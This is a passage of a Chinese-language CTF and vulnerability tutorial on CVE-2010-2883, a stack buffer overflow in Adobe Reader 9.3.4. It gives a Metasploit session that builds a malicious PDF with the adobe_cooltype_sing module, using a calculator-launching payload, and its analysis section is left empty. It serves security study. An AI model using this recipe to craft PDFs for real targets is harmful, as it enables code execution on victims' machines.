mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2024-10-19 01:12:52 +07:00
53 lines
1.8 KiB
Markdown
53 lines
1.8 KiB
Markdown
# 7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow
|
||
|
||
- [漏洞描述](#漏洞描述)
|
||
- [漏洞复现](#漏洞复现)
|
||
- [漏洞分析](#漏洞分析)
|
||
- [参考资料](#参考资料)
|
||
|
||
|
||
[下载文件](../src/exploit/7.1.8_adobe_reader_2010-2883)
|
||
|
||
## 漏洞描述
|
||
Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助带有 TTF 字体的 Smart INdependent Glyphlets (SING) 表格中超长字段的 PDF 文件执行任意代码或者导致拒绝服务。
|
||
|
||
|
||
## 漏洞复现
|
||
| |推荐使用的环境 | 备注 |
|
||
| --- | --- | --- |
|
||
| 操作系统 | Windows XP SP3 | 体系结构:32 位 |
|
||
| 调试器 | WinDbg | 版本号:10.0 x86 |
|
||
| 漏洞软件 | Adobe Reader | 版本号:9.3.4 |
|
||
|
||
我们利用 Metasploit 来生成攻击样本:
|
||
```
|
||
msf > search cve-2010-2883
|
||
Name Disclosure Date Rank Description
|
||
---- --------------- ---- -----------
|
||
exploit/windows/fileformat/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
|
||
|
||
msf > use exploit/windows/fileformat/adobe_cooltype_sing
|
||
|
||
msf exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/exec
|
||
payload => windows/exec
|
||
|
||
msf exploit(windows/fileformat/adobe_cooltype_sing) > set cmd calc.exe
|
||
cmd => calc.exe
|
||
|
||
msf exploit(windows/fileformat/adobe_cooltype_sing) > set filename cve20102883.pdf
|
||
filename => cve20102883.pdf
|
||
|
||
msf exploit(windows/fileformat/adobe_cooltype_sing) > exploit
|
||
[*] Creating 'cve20102883.pdf' file...
|
||
[+] cve20102883.pdf stored at /home/firmy/.msf4/local/cve20102883.pdf
|
||
```
|
||
|
||
使用漏洞版本的 Adobe Reader 打开样本,即可弹出计算器:
|
||
|
||
|
||
## 漏洞分析
|
||
|
||
## 参考资料
|
||
- 《漏洞战争》
|
||
- https://www.cvedetails.com/cve/CVE-2010-2883/
|